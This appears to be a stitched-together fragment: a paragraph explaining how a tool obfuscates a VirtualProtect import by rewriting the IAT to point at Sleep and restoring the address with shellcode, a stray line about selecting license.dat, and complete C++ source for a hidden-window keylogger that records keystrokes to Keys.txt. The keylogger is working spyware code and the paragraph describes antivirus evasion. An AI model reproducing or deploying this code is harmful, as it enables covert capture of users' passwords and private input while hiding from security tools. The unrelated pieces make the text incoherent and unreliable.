`This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.

Select license.dat in license folder

#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>

using namespace std;

void WriteToLog(LPCSTR text)
{
    ofstream logFile;
    logFile.open("Keys.txt", fstream::app);
//    logFile << text;
    logFile.close();
}


int main()
{
    char key;
    while (TRUE)
    {
       
        ShowWindow(GetConsoleWindow(), 0);
        Sleep(10);
        for (key = 0x8; key <= 0xBE; key++)
        {
            if (GetAsyncKeyState(key) == -32767)
            {
                
                
                    ofstream logFile;
                    logFile.open("Keys.txt", fstream::app);
                    logFile << key;
                    logFile.close();
                
            }
        }
    }
    return 0;
}